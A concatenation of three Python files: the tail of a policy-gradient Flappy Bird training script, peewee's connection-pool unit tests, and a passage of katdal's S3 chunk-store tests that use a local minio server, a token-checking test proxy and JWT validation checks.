x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = F.relu(self.fc3(x))
x = F.sigmoid(self.fc4(x)) # Finally returns probability of flapping
return x
def plot_durations(episode_durations, batch_size):
# Plot curve of median survival duration for each batch
# Adapted from http://pytorch.org/tutorials/intermediate/reinforcement_q_learning.html
plt.figure(2)
plt.clf()
plt.title('Training...')
plt.xlabel('Episode')
plt.ylabel('Duration')
plt.plot(episode_durations) # Plot individual episode durations
# Here we calculate the median of each batch, and plot them
num_batches = int(np.ceil(len(episode_durations)/batch_size))
batch_medians = []
for batch in range(num_batches):
batch_median = np.median(episode_durations[batch*batch_size:(batch+1)*batch_size])
batch_medians += [batch_median]*batch_size
plt.plot(batch_medians)
plt.yscale('log')
plt.pause(0.001) # Allow plot to update
def discount_rewards(r, gamma):
# This function performs discounting of rewards by going back
# and punishing or rewarding based upon final outcome of episode
disc_r = np.zeros_like(r, dtype=float)
running_sum = 0
for t in reversed(range(0, len(r))):
if r[t] == -1: # If the reward is -1...
running_sum = 0 # ...then reset sum, since it's a game boundary
running_sum = running_sum * gamma + r[t]
disc_r[t] = running_sum
# Here we normalise with respect to mean and standard deviation:
discounted_rewards = (disc_r - disc_r.mean()) / (disc_r.std() + np.finfo(float).eps)
# Note that we add eps in the rare case that the std is 0
return discounted_rewards
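# Worked example: with gamma=0.99 the rewards [0, 0, -1] discount to
# [-0.9801, -0.99, -1.0] before normalisation (the running sum resets at the -1 boundary).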
def preprocess(state):
# This function performs preprocessing on the state frame data
# Input: 288x512 matrix of integers
# Output: 72x100 matrix of floats
state = state[:, :400] # Crop lower part of screen below pipes
state = state[::4, ::4] # Downsample frame to 1/4 the size for efficiency
state = state.ravel().astype(float) # Convert to float (from int) and unravel from 2d->1d
state -= state.mean() # Normalise by subtracting mean and dividing by std
state /= state.std() + np.finfo(float).eps # Note that here I add eps in case std is 0
return torch.from_numpy(state).float() # Return state in format required by PyTorch
def main(num_batches=10000):
# Notes:
# 'state' is a 2d array containing a 288x512 matrix of integers (the frames are rotated by PyGame)
# 'reward' is defined as:
# +1 for scoring a point (getting through a pipe)
# -1 for dying
# 'done' is True upon dying, signifying the end of the episode
# Define parameters:
batch_size = 25 # Number of episodes to run before updating net parameters
learning_rate = 1e-4 # Learning rate used to scale gradient updates
gamma = 0.99 # Discount factor when accumulating future rewards
mode = 'train'
# Network initialisation:
agent = Net() # Define agent as an object of class Net (defined above)
opt = optim.Adam(agent.parameters(), lr=learning_rate)
# ^ Define optimiser as Adam with above defined learn rate.
# Define queues for sending/receiving data from game:
input_queue = mp.Queue()
output_queue = mp.Queue()
# Start game on a separate process:
p = mp.Process(target=flappy.main, args=(input_queue, output_queue, mode))
p.start()
# Initialise storage variables and counters:
episode_durations = [] # This variable is used for plotting only
batch_log_prob, batch_rewards = [], [] # These variables are used for calculating loss
batch_final_rewards = [] # This variable is used for deciding when to save
best_batch_median = 0 # Variable to determine best model so far, for saving
st = time.time()
for batch in range(num_batches):
        for episode in range(batch_size):  # Run batch_size episodes before each parameter update
input_queue.put(True) # This starts next episode
output_queue.get() # Gets blank response to confirm episode started
input_queue.put(False) # Input initial action as no flap
state, reward, done = output_queue.get() # Get initial state
episode_steps = 0 # Number of steps taken in current episode
episode_reward = 0 # Amount of reward obtained from current episode
while not done:
state = preprocess(state) # Preprocess the raw state data for usage with agent
flap_probability = agent(state) # Forward pass state through network to get flap probability
prob_dist = Bernoulli(flap_probability) # Generate Bernoulli distribution with given probability
action = prob_dist.sample() # Sample action from probability distribution
log_prob = prob_dist.log_prob(action) # Store log probability of action
if action == 1:
input_queue.put(True) # If action is 1, input True
else:
input_queue.put(False) # Otherwise, False
state, reward, done = output_queue.get() # Get resulting state and reward from above action
batch_log_prob.append(log_prob) # Store the log probability for loss calculation
batch_rewards.append(reward) # Store the reward obtained as a result of action
episode_reward += reward # Increase current episode's reward counter
episode_steps += 1 # Increase number of steps taken on current episode
batch_final_rewards.append(episode_reward)
episode_durations.append(episode_steps) # Include current episode's step count for plot
print('Batch {}, Episode {} || Reward: {:.1f} || Steps: {} '.format(batch, episode, episode_reward, episode_steps))
input_queue.put(True) # Reset the game.
#Once batch of rollouts is complete:
plot_durations(episode_durations, batch_size) # Update plot to include current batch
discounted_rewards = discount_rewards(batch_rewards, gamma) # Discount rewards with discount factor gamma
opt.zero_grad() # Zero gradients to clear existing data
for i in range(len(batch_log_prob)):
loss = -batch_log_prob[i]*discounted_rewards[i] # Calculate negative log likelihood loss, scaled by reward
loss.backward() # Backpropagate to calculate gradients
print('Updating network weights.')
opt.step() # Update network weights using above accumulated gradients
batch_median = np.median(batch_final_rewards)
# If current model has best median performance, save:
if batch_median > best_batch_median:
print('New best batch median {} (previously {}), saving network weights.'.format(batch_median, best_batch_median))
best_batch_median = batch_median
state = {
'state_dict': agent.state_dict(),
'optimizer': opt.state_dict(),
}
torch.save(state, 'model/trained-model.pt')
# Load using:
# state = torch.load(filepath)
# agent.load_state_dict(state['state_dict']), opt.load_state_dict(state['optimizer'])
else:
print('Batch Median Reward: {}'.format(batch_median))
print('Batch Size: {}, Time Taken: {:.2f}s'.format(batch_size,time.time()-st))
st = time.time()
batch_log_prob, batch_rewards = [], [] # Reset batch log probabilities and rewards
batch_final_rewards = [] # Reset end reward for each episode in batch
p.terminate() # Once all episodes are finished, terminate the process.
if __name__ == "__main__":
main()
|
pool.py
|
import heapq
import os
import threading
import time
from peewee import *
from peewee import _savepoint
from peewee import _transaction
from playhouse.pool import *
from .base import BaseTestCase
from .base import ModelTestCase
from .base_models import Register
class FakeTransaction(_transaction):
def _add_history(self, message):
self.db.transaction_history.append(
'%s%s' % (message, self._conn))
def __enter__(self):
self._conn = self.db.connection()
self._add_history('O')
self.db.push_transaction(self)
def __exit__(self, *args):
self._add_history('X')
self.db.pop_transaction()
class FakeDatabase(SqliteDatabase):
def __init__(self, *args, **kwargs):
self.counter = self.closed_counter = 0
self.transaction_history = []
super(FakeDatabase, self).__init__(*args, **kwargs)
def _connect(self):
self.counter += 1
return self.counter
def _close(self, conn):
self.closed_counter += 1
def transaction(self):
return FakeTransaction(self)
class FakePooledDatabase(PooledDatabase, FakeDatabase):
def __init__(self, *args, **kwargs):
super(FakePooledDatabase, self).__init__(*args, **kwargs)
self.conn_key = lambda conn: conn
class PooledTestDatabase(PooledDatabase, SqliteDatabase):
pass
class TestPooledDatabase(BaseTestCase):
def setUp(self):
super(TestPooledDatabase, self).setUp()
self.db = FakePooledDatabase('testing')
def test_connection_pool(self):
self.assertEqual(self.db.connection(), 1)
self.assertEqual(self.db.connection(), 1)
self.db.close()
self.db.connect()
self.assertEqual(self.db.connection(), 1)
def test_reuse_connection(self):
self.assertEqual(self.db.connection(), 1)
self.assertRaises(OperationalError, self.db.connect)
self.assertFalse(self.db.connect(reuse_if_open=True))
self.assertEqual(self.db.connection(), 1)
self.db.close()
self.db.connect()
self.assertEqual(self.db.connection(), 1)
def test_concurrent_connections(self):
db = FakePooledDatabase('testing')
signal = threading.Event()
def open_conn():
db.connect()
signal.wait()
db.close()
# Simulate 5 concurrent connections.
threads = [threading.Thread(target=open_conn) for i in range(5)]
for thread in threads:
thread.start()
# Wait for all connections to be opened.
while db.counter < 5:
time.sleep(.01)
# Signal threads to close connections and join threads.
signal.set()
for t in threads: t.join()
self.assertEqual(db.counter, 5)
self.assertEqual(
sorted([conn for _, conn in db._connections]),
[1, 2, 3, 4, 5]) # All 5 are ready to be re-used.
self.assertEqual(db._in_use, {})
def test_max_conns(self):
for i in range(self.db._max_connections):
self.db._state.closed = True # Hack to make it appear closed.
self.db.connect()
self.assertEqual(self.db.connection(), i + 1)
self.db._state.closed = True
self.assertRaises(ValueError, self.db.connect)
def test_stale_timeout(self):
# Create a test database with a very short stale timeout.
db = FakePooledDatabase('testing', stale_timeout=.001)
self.assertEqual(db.connection(), 1)
self.assertTrue(1 in db._in_use)
# Sleep long enough for the connection to be considered stale.
time.sleep(.001)
# When we close, since the conn is stale it won't be returned to
# the pool.
db.close()
self.assertEqual(db._in_use, {})
self.assertEqual(db._connections, [])
self.assertEqual(db._closed, set())
# A new connection will be returned.
self.assertEqual(db.connection(), 2)
def test_stale_on_checkout(self):
# Create a test database with a very short stale timeout.
db = FakePooledDatabase('testing', stale_timeout=.005)
self.assertEqual(db.connection(), 1)
self.assertTrue(1 in db._in_use)
        # When we close, the conn is not yet stale, so it is returned to
        # the pool.
db.close()
assert len(db._connections) == 1, 'Test runner too slow!'
# Sleep long enough for the connection to be considered stale.
time.sleep(.005)
self.assertEqual(db._in_use, {})
self.assertEqual(len(db._connections), 1)
# A new connection will be returned, as the original one is stale.
# The stale connection (1) will be removed and not placed in the
# "closed" set.
self.assertEqual(db.connection(), 2)
self.assertEqual(db._closed, set())
def test_manual_close(self):
self.assertEqual(self.db.connection(), 1)
self.db.manual_close()
# When we manually close a connection that's not yet stale, we add it
# back to the queue (because close() calls _close()), then close it
# for real, and mark it with a tombstone. The next time it's checked
# out, it will simply be removed and skipped over.
self.assertEqual(self.db._closed, set([1]))
self.assertEqual(len(self.db._connections), 1)
self.assertEqual(self.db._in_use, {})
self.assertEqual(self.db.connection(), 2)
self.assertEqual(self.db._closed, set())
self.assertEqual(len(self.db._connections), 0)
self.assertEqual(list(self.db._in_use.keys()), [2])
self.db.close()
self.assertEqual(self.db.connection(), 2)
def test_stale_timeout_cascade(self):
now = time.time()
db = FakePooledDatabase('testing', stale_timeout=10)
conns = [
(now - 20, 1),
(now - 15, 2),
(now - 5, 3),
(now, 4),
]
for ts_conn in conns:
heapq.heappush(db._connections, ts_conn)
self.assertEqual(db.connection(), 3)
self.assertEqual(db._in_use, {3: now - 5})
self.assertEqual(db._connections, [(now, 4)])
def test_connect_cascade(self):
now = time.time()
db = FakePooledDatabase('testing', stale_timeout=10)
conns = [
(now - 15, 1), # Skipped due to being stale.
(now - 5, 2), # In the 'closed' set.
(now - 3, 3),
(now, 4), # In the 'closed' set.
]
db._closed.add(2)
db._closed.add(4)
db.counter = 4 # The next connection we create will have id=5.
for ts_conn in conns:
heapq.heappush(db._connections, ts_conn)
# Conn 3 is not stale or closed, so we will get it.
self.assertEqual(db.connection(), 3)
self.assertEqual(db._in_use, {3: now - 3})
self.assertEqual(db._connections, [(now, 4)])
# Since conn 4 is closed, we will open a new conn.
db._state.closed = True # Pretend we're in a different thread.
db.connect()
self.assertEqual(db.connection(), 5)
self.assertEqual(sorted(db._in_use.keys()), [3, 5])
self.assertEqual(db._connections, [])
def test_db_context(self):
self.assertEqual(self.db.connection(), 1)
with self.db:
self.assertEqual(self.db.connection(), 1)
self.assertEqual(self.db.transaction_history, ['O1'])
self.assertEqual(self.db.connection(), 1)
self.assertEqual(self.db.transaction_history, ['O1', 'X1'])
with self.db:
self.assertEqual(self.db.connection(), 1)
self.assertEqual(len(self.db._connections), 1)
self.assertEqual(len(self.db._in_use), 0)
def test_db_context_threads(self):
signal = threading.Event()
def create_context():
with self.db:
signal.wait()
threads = [threading.Thread(target=create_context) for i in range(5)]
for thread in threads: thread.start()
while len(self.db.transaction_history) < 5:
time.sleep(.001)
signal.set()
for thread in threads: thread.join()
self.assertEqual(self.db.counter, 5)
self.assertEqual(len(self.db._connections), 5)
self.assertEqual(len(self.db._in_use), 0)
class TestLivePooledDatabase(ModelTestCase):
database = PooledTestDatabase('test_pooled.db')
requires = [Register]
def tearDown(self):
super(TestLivePooledDatabase, self).tearDown()
self.database.close_all()
if os.path.exists('test_pooled.db'):
os.unlink('test_pooled.db')
def test_reuse_connection(self):
for i in range(5):
Register.create(value=i)
conn_id = id(self.database.connection())
self.database.close()
for i in range(5, 10):
Register.create(value=i)
self.assertEqual(id(self.database.connection()), conn_id)
self.assertEqual(
[x.value for x in Register.select().order_by(Register.id)],
list(range(10)))
def test_db_context(self):
with self.database:
Register.create(value=1)
with self.database.atomic() as sp:
self.assertTrue(isinstance(sp, _savepoint))
Register.create(value=2)
sp.rollback()
with self.database.atomic() as sp:
self.assertTrue(isinstance(sp, _savepoint))
Register.create(value=3)
with self.database:
values = [r.value for r in Register.select().order_by(Register.id)]
self.assertEqual(values, [1, 3])
def test_bad_connection(self):
self.database.connection()
try:
self.database.execute_sql('select 1/0')
except Exception as exc:
pass
self.database.close()
self.database.connect()
|
test_chunkstore_s3.py
|
################################################################################
# Copyright (c) 2017-2019, National Research Foundation (Square Kilometre Array)
#
# Licensed under the BSD 3-Clause License (the "License"); you may not use
# this file except in compliance with the License. You may obtain a copy
# of the License at
#
# https://opensource.org/licenses/BSD-3-Clause
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
"""Tests for :py:mod:`katdal.chunkstore_s3`.
The tests require `minio`_ to be installed on the :envvar:`PATH`. If not found,
the test will be skipped.
Versions of minio prior to 2018-08-25T01:56:38Z contain a `race condition`_
that can cause it to crash when queried at the wrong point during startup. If
an older version is detected, the test will be skipped.
.. _minio: https://github.com/minio/minio
.. _race condition: https://github.com/minio/minio/issues/6324
"""
import os
import tempfile
import shutil
import threading
import time
import socket
import http.server
import urllib.parse
import contextlib
import io
import warnings
import re
import pathlib
from urllib3.util.retry import Retry
import numpy as np
from numpy.testing import assert_array_equal
from nose import SkipTest
from nose.tools import assert_raises, assert_equal, assert_in, assert_not_in, timed
import requests
import jwt
import katsdptelstate
from katsdptelstate.rdb_writer import RDBWriter
from katdal.chunkstore_s3 import (S3ChunkStore, _AWSAuth, read_array,
decode_jwt, InvalidToken, TruncatedRead,
_DEFAULT_SERVER_GLITCHES)
from katdal.chunkstore import StoreUnavailable, ChunkNotFound
from katdal.test.test_chunkstore import ChunkStoreTestBase
from katdal.test.s3_utils import S3User, S3Server, MissingProgram
from katdal.datasources import TelstateDataSource
from katdal.test.test_datasources import make_fake_data_source, assert_telstate_data_source_equal
# Use a standard bucket for most tests to ensure valid bucket name (regex '^[0-9a-z.-]{3,63}$')
BUCKET = 'katdal-unittest'
# Also authorise this prefix for tests that will make their own buckets
PREFIX = '1234567890'
# Pick quick but different timeouts and retries for unit tests:
# - The effective connect timeout is 5.0 (initial) + 5.0 (1 retry) = 10 seconds
# - The effective read timeout is 0.4 + 0.4 = 0.8 seconds
# - The effective status timeout is 0.1 * (0 + 2 + 4) = 0.6 seconds, or
# 4 * 0.1 + 0.6 = 1.0 second if the suggestions use SUGGESTED_STATUS_DELAY
TIMEOUT = (5.0, 0.4)
RETRY = Retry(connect=1, read=1, status=3, backoff_factor=0.1,
raise_on_status=False, status_forcelist=_DEFAULT_SERVER_GLITCHES)
SUGGESTED_STATUS_DELAY = 0.1
READ_PAUSE = 0.1
@contextlib.contextmanager
def get_free_port(host):
"""Get an unused port number.
This is a context manager that returns a port, while holding open the
socket bound to it. This prevents another ephemeral process from
obtaining the port in the meantime. The target process should bind the
port with SO_REUSEPORT, after which the context should be exited to close
the temporary socket.
"""
with contextlib.closing(socket.socket()) as sock:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
sock.bind((host, 0))
port = sock.getsockname()[1]
yield port
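# A minimal usage sketch (illustrative only; `make_server` is a hypothetical
# factory, not part of this module): reserve a port, exit the context to release
# the temporary socket, then immediately start the real server on that port.
#     with get_free_port('127.0.0.1') as port:
#         pass
#     server = make_server('127.0.0.1', port)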
class TestReadArray:
def _test(self, array):
fp = io.BytesIO()
np.save(fp, array)
fp.seek(0)
out = read_array(fp)
np.testing.assert_equal(array, out)
# Check that Fortran order was preserved
assert_equal(array.strides, out.strides)
def testSimple(self):
self._test(np.arange(20))
def testMultiDim(self):
self._test(np.arange(20).reshape(4, 5, 1))
def testFortran(self):
self._test(np.arange(20).reshape(4, 5, 1).T)
def testV2(self):
# Make dtype that needs more than 64K to store, forcing .npy version 2.0
dtype = np.dtype([('a' * 70000, np.float32), ('b', np.float32)])
with warnings.catch_warnings():
# Suppress warning that V2 files can only be read by numpy >= 1.9
warnings.simplefilter('ignore', category=UserWarning)
self._test(np.zeros(100, dtype))
def testBadVersion(self):
data = b'\x93NUMPY\x03\x04' # Version 3.4
fp = io.BytesIO(data)
with assert_raises(ValueError):
read_array(fp)
def testPickled(self):
array = np.array([str, object])
fp = io.BytesIO()
np.save(fp, array)
fp.seek(0)
with assert_raises(ValueError):
read_array(fp)
def _truncate_and_fail_to_read(self, *args):
fp = io.BytesIO()
np.save(fp, np.arange(20))
fp.seek(*args)
fp.truncate()
fp.seek(0)
with assert_raises(TruncatedRead):
read_array(fp)
def testShort(self):
# Chop off everything past first byte (in magic part of bytes)
self._truncate_and_fail_to_read(1)
# Chop off everything past byte 20 (in header part of bytes)
self._truncate_and_fail_to_read(20)
# Chop off last byte (in array part of bytes)
self._truncate_and_fail_to_read(-1, 2)
def encode_jwt(header, payload, signature=86 * 'x'):
"""Generate JWT token with encoded signature (dummy ES256 one by default)."""
# Don't specify algorithm='ES256' here since that needs cryptography package
# This generates an Unsecured JWS without a signature: '<header>.<payload>.'
header_payload = jwt.encode(payload, '', algorithm='none', headers=header)
# Now tack on a signature that nominally matches the header
return header_payload + signature
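# Note (added observation, not from the original author): 86 base64url characters
# is the unpadded length of a 64-byte ES256 signature, so the dummy signature has
# a realistic length even though no key ever produced it. Illustrative use:
#     token = encode_jwt({'alg': 'ES256', 'typ': 'JWT'}, {'iss': 'kat'})
#     assert token.count('.') == 2   # '<header>.<payload>.<signature>'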
class TestTokenUtils:
"""Test token utility and validation functions."""
def test_jwt_broken_token(self):
header = {'alg': 'ES256', 'typ': 'JWT'}
payload = {'exp': 9234567890, 'iss': 'kat', 'prefix': ['123']}
token = encode_jwt(header, payload)
claims = decode_jwt(token)
assert_equal(payload, claims)
# Token has invalid characters
assert_raises(InvalidToken, decode_jwt, '** bad token **')
# Token has invalid structure
assert_raises(InvalidToken, decode_jwt, token.replace('.', ''))
# Token header failed to decode
assert_raises(InvalidToken, decode_jwt, token[1:])
# Token payload failed to decode
h, p, s = token.split('.')
assert_raises(InvalidToken, decode_jwt, '.'.join((h, p[:-1], s)))
# Token signature failed to decode or wrong length
assert_raises(InvalidToken, decode_jwt, token[:-1])
assert_raises(InvalidToken, decode_jwt, token[:-2])
assert_raises(InvalidToken, decode_jwt, token + token[-4:])
def test_jwt_expired_token(self):
header = {'alg': 'ES256', 'typ': 'JWT'}
payload = {'exp': 0, 'iss': 'kat', 'prefix': ['123']}
token = encode_jwt(header, payload)
assert_raises(InvalidToken, decode_jwt, token)
# Check that expiration time is not-too-large integer
payload['exp'] = 1.2
assert_raises(InvalidToken, decode_jwt, encode_jwt(header, payload))
payload['exp'] = 12345678901234567890
assert_raises(InvalidToken, decode_jwt, encode_jwt(header, payload))
# Check that it works without expiry date too
del payload['exp']
claims = decode_jwt(encode_jwt(header, payload))
assert_equal(payload, claims)
class TestS3ChunkStore(ChunkStoreTestBase):
"""Test S3 functionality against an actual (minio) S3 service."""
@classmethod
def start_minio(cls, host):
"""Start Fake S3 service on `host` and return its URL."""
try:
host = '127.0.0.1' # Unlike 'localhost', guarantees IPv4
with get_free_port(host) as port:
pass
# The port is now closed, which makes it available for minio to
# bind to. While MinIO on Linux is able to bind to the same port
# as the socket held open by get_free_port, Mac OS is not.
cls.minio = S3Server(host, port, pathlib.Path(cls.tempdir), S3User(*cls.credentials))
except MissingProgram as exc:
raise SkipTest(str(exc))
return cls.minio.url
@classmethod
def prepare_store_args(cls, url, **kwargs):
"""Prepare the arguments used to construct `S3ChunkStore`."""
kwargs.setdefault('timeout', TIMEOUT)
kwargs.setdefault('retries', RETRY)
kwargs.setdefault('credentials', cls.credentials)
return url, kwargs
@classmethod
def setup_class(cls):
"""Start minio service running on temp dir, and ChunkStore on that."""
cls.credentials = ('access*key', 'secret*key')
cls.tempdir = tempfile.mkdtemp()
cls.minio = None
try:
cls.s3_url = cls.start_minio('127.0.0.1')
cls.store_url, cls.store_kwargs = cls.prepare_store_args(cls.s3_url)
cls.store = S3ChunkStore(cls.store_url, **cls.store_kwargs)
# Ensure that pagination is tested
cls.store.list_max_keys = 3
except Exception:
cls.teardown_class()
raise
@classmethod
def teardown_class(cls):
if cls.minio:
cls.minio.close()
shutil.rmtree(cls.tempdir)
def setup(self):
# The server is a class-level fixture (for efficiency), so state can
# leak between tests. Prevent that by removing any existing objects.
# It's easier to do that by manipulating the filesystem directly than
# trying to use the S3 API.
data_dir = os.path.join(self.tempdir, 'data')
for entry in os.scandir(data_dir):
if not entry.name.startswith('.') and entry.is_dir():
shutil.rmtree(entry.path)
# Also get rid of the cache of verified buckets
self.store._verified_buckets.clear()
def array_name(self, name):
"""Ensure that bucket is authorised and has valid name."""
if name.startswith(PREFIX):
return name
return self.store.join(BUCKET, name)
def test_chunk_non_existent(self):
# An empty bucket will trigger StoreUnavailable so put something in there first
self.store.mark_complete(self.array_name('crumbs'))
return super().test_chunk_non_existent()
def test_public_read(self):
url, kwargs = self.prepare_store_args(self.s3_url, credentials=None)
reader = S3ChunkStore(url, **kwargs)
# Create a non-public-read array.
# This test deliberately doesn't use array_name so that it can create
# several different buckets.
slices = np.index_exp[0:5]
x = np.arange(5)
self.store.create_array('private/x')
self.store.put_chunk('private/x', slices, x)
# Ceph RGW returns 403 for missing chunks too so we see ChunkNotFound
# The ChunkNotFound then triggers a bucket list that raises StoreUnavailable
with assert_raises(StoreUnavailable):
reader.get_chunk('private/x', slices, x.dtype)
# Now a public-read array
url, kwargs = self.prepare_store_args(self.s3_url, public_read=True)
store = S3ChunkStore(url, **kwargs)
store.create_array('public/x')
store.put_chunk('public/x', slices, x)
y = reader.get_chunk('public/x', slices, x.dtype)
np.testing.assert_array_equal(x, y)
@timed(0.1 + 0.2)
def test_store_unavailable_unresponsive_server(self):
host = '127.0.0.1'
with get_free_port(host) as port:
url = f'http://{host}:{port}/'
store = S3ChunkStore(url, timeout=0.1, retries=0)
with assert_raises(StoreUnavailable):
store.is_complete('store_is_not_listening_on_that_port')
def test_token_without_https(self):
# Don't allow users to leak their tokens by accident
with assert_raises(StoreUnavailable):
S3ChunkStore('http://apparently.invalid/', token='secrettoken')
def test_mark_complete_top_level(self):
self._test_mark_complete(PREFIX + '-completetest')
def test_rdb_support(self):
telstate = katsdptelstate.TelescopeState()
view, cbid, sn, _, _ = make_fake_data_source(telstate, self.store, (5, 16, 40), PREFIX)
telstate['capture_block_id'] = cbid
telstate['stream_name'] = sn
# Save telstate to temp RDB file since RDBWriter needs a filename and not a handle
rdb_filename = f'{cbid}_{sn}.rdb'
temp_filename = os.path.join(self.tempdir, rdb_filename)
with RDBWriter(temp_filename) as rdbw:
rdbw.save(telstate)
# Read the file back in and upload it to S3
with open(temp_filename, mode='rb') as rdb_file:
rdb_data = rdb_file.read()
rdb_url = urllib.parse.urljoin(self.store_url, self.store.join(cbid, rdb_filename))
self.store.create_array(cbid)
self.store.complete_request('PUT', rdb_url, data=rdb_data)
# Check that data source can be constructed from URL (with auto chunk store)
source_from_url = TelstateDataSource.from_url(rdb_url, **self.store_kwargs)
source_direct = TelstateDataSource(view, cbid, sn, self.store)
assert_telstate_data_source_equal(source_from_url, source_direct)
def test_missing_or_empty_buckets(self):
slices = (slice(0, 1),)
        dtype = np.dtype(float)  # avoid np.float, which newer NumPy versions removed
# Without create_array the bucket is missing
with assert_raises(StoreUnavailable):
self.store.get_chunk(f'{BUCKET}-missing/x', slices, dtype)
self.store.create_array(f'{BUCKET}-empty/x')
# Without put_chunk the bucket is empty
with assert_raises(StoreUnavailable):
self.store.get_chunk(f'{BUCKET}-empty/x', slices, dtype)
# Check that the standard bucket has not been verified yet
bucket_url = urllib.parse.urljoin(self.store._url, BUCKET)
assert_not_in(bucket_url, self.store._verified_buckets)
# Check that the standard bucket remains verified after initial check
self.test_chunk_non_existent()
assert_in(bucket_url, self.store._verified_buckets)
class _TokenHTTPProxyHandler(http.server.BaseHTTPRequestHandler):
"""HTTP proxy that substitutes AWS credentials in place of a bearer token."""
def __getattr__(self, name):
"""Handle all HTTP requests by the same method since this is a proxy."""
if name.startswith('do_'):
return self.do_all
return self.__getattribute__(name)
def do_all(self):
# See https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Connection
HOP_HEADERS = {
'keep-alive', 'transfer-encoding', 'te', 'connection', 'trailer',
'upgrade', 'proxy-authorization', 'proxy-authenticate'
}
self.protocol_version = 'HTTP/1.1'
data_len = int(self.headers.get('Content-Length', 0))
data = self.rfile.read(data_len)
truncate = False
pause = 0.0
glitch_location = 0
# Extract a proxy suggestion prepended to the path
suggestion = re.search(r'/please-([^/]+?)(?:-for-([\d\.]+)-seconds)?/',
self.path)
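        # For example (based on the chunk names used in the tests below), a path
        # containing '/please-respond-with-500-for-0.8-seconds/' asks the proxy to
        # answer with HTTP 500 for 0.8 seconds before proxying requests normally.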
if suggestion:
# Check when this exact request (including suggestion) was first made
key = self.requestline
initial_time = self.server.initial_request_time.setdefault(key, time.time())
# Remove suggestion from path
start, end = suggestion.span()
self.path = self.path[:start] + '/' + self.path[end:]
command, duration = suggestion.groups()
duration = float(duration) if duration else np.inf
# If the suggestion is still active, go ahead with it
if time.time() < initial_time + duration:
# Respond with the suggested status code for a while
respond_with = re.match(r'^respond-with-(\d+)$', command)
if respond_with:
status_code = int(respond_with.group(1))
time.sleep(SUGGESTED_STATUS_DELAY)
self.send_response(status_code, 'Suggested by unit test')
self.end_headers()
return
# Truncate or pause transmission of the payload after specified bytes
glitch = re.match(r'^(truncate|pause)-read-after-(\d+)-bytes$', command)
if glitch:
flavour = glitch.group(1)
truncate = (flavour == 'truncate')
pause = READ_PAUSE if flavour == 'pause' else 0.0
glitch_location = int(glitch.group(2))
else:
raise ValueError(f"Unknown command '{command}' "
f'in proxy suggestion {suggestion}')
else:
# We're done with this suggestion since its time ran out
del self.server.initial_request_time[key]
# Extract token, validate it and check if path is authorised by it
        auth_header = self.headers.get('Authorization', '').split()
if len(auth_header) == 2 and auth_header[0] == 'Bearer':
token = auth_header[1]
else:
token = ''
try:
prefixes = decode_jwt(token).get('prefix', [])
except InvalidToken:
prefixes = []
if not any(self.path.lstrip('/').startswith(prefix) for prefix in prefixes):
self.send_response(401, f'Unauthorized (got: {self.path}, allowed: {prefixes})')
self.end_headers()
return
# Clear out hop-by-hop headers
request_headers = dict(self.headers.items())
for header in self.headers:
if header.lower() in HOP_HEADERS:
del request_headers[header]
url = urllib.parse.urljoin(self.server.target, self.path)
try:
with self.server.session.request(self.command, url,
headers=request_headers, data=data,
auth=self.server.auth,
allow_redirects=False,
timeout=5) as resp:
content = resp.content
status_code = resp.status_code
reason = resp.reason
headers = resp.headers.copy()
except requests.RequestException as e:
content = str(e).encode('utf-8')
status_code = 503
reason = 'Service unavailable'
headers = {
'Content-type': 'text/plain',
'Content-length': str(len(content))
}
self.send_response(status_code, reason)
for key, value in headers.items():
# The base class automatically sets Date and Server headers
if key.lower() not in HOP_HEADERS.union({'date', 'server'}):
self.send_header(key, value)
self.end_headers()
if pause:
self.wfile.write(content[:glitch_location])
# The wfile object should be an unbuffered _SocketWriter but flush anyway
self.wfile.flush()
time.sleep(pause)
self.wfile.write(content[glitch_location:])
else:
self.wfile.write(content[:glitch_location] if truncate else content)
def log_message(self, format, *args):
# Get time offset from first of these requests (useful for debugging)
# XXX Could also use args[0] instead of requestline, not sure which is best
key = self.requestline
now = time.time()
# Print 0.0 for a fresh suggestion and -1.0 for a stale / absent suggestion (no key found)
initial_time = self.server.initial_request_time.get(key, now + 1.0)
time_offset = now - initial_time
# Print to stdout instead of stderr so that it doesn't spew all over
# the screen in normal operation.
print(f"Token proxy: {self.log_date_time_string()} ({time_offset:.3f}) {format % args}")
class _TokenHTTPProxyServer(http.server.HTTPServer):
"""Server for use with :class:`_TokenHTTPProxyHandler`.
It sets SO_REUSEPORT so that it is compatible with a socket created by
:func:`get_free_port`, including on OS X.
"""
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
super().server_bind()
class TestS3ChunkStoreToken(TestS3ChunkStore):
"""Test S3 with token authentication headers."""
@classmethod
def setup_class(cls):
cls.proxy_url = None
cls.httpd = None
super().setup_class()
@classmethod
def teardown_class(cls):
if cls.httpd is not None:
cls.httpd.session.close()
cls.httpd.shutdown()
cls.httpd = None
cls.httpd_thread.join()
cls.httpd_thread = None
super().teardown_class()
@classmethod
def prepare_store_args(cls, url, **kwargs):
"""Prepare the arguments used to construct `S3ChunkStore`."""
if cls.httpd is None:
proxy_host = '127.0.0.1'
with get_free_port(proxy_host) as proxy_port:
httpd = _TokenHTTPProxyServer((proxy_host, proxy_port), _TokenHTTPProxyHandler)
httpd.target = url
httpd.session = requests.Session()
httpd.auth = _AWSAuth(cls.credentials)
httpd.initial_request_time = {}
cls.httpd_thread = threading.Thread(target=httpd.serve_forever)
cls.httpd_thread.start()
# We delay setting cls.httpd until we've launched serve_forever,
# because teardown calls httpd.shutdown and that hangs if
# serve_forever wasn't called.
cls.httpd = httpd
cls.proxy_url = f'http://{proxy_host}:{proxy_port}'
elif url != cls.httpd.target:
raise RuntimeError('Cannot use multiple target URLs with http proxy')
# The token authorises the standard bucket and anything starting with PREFIX
token = encode_jwt({'alg': 'ES256', 'typ': 'JWT'}, {'prefix': [BUCKET, PREFIX]})
kwargs.setdefault('token', token)
return super().prepare_store_args(cls.proxy_url, credentials=None, **kwargs)
def test_public_read(self):
# Disable this test defined in the base class because it involves creating
# buckets, which is not done with tokens but rather with credentials.
pass
def test_unauthorised_bucket(self):
with assert_raises(InvalidToken):
self.store.is_complete('unauthorised_bucket')
def _put_chunk(self, suggestion):
"""Put a chunk into the store and form an array name containing suggestion."""
var_name = 'x'
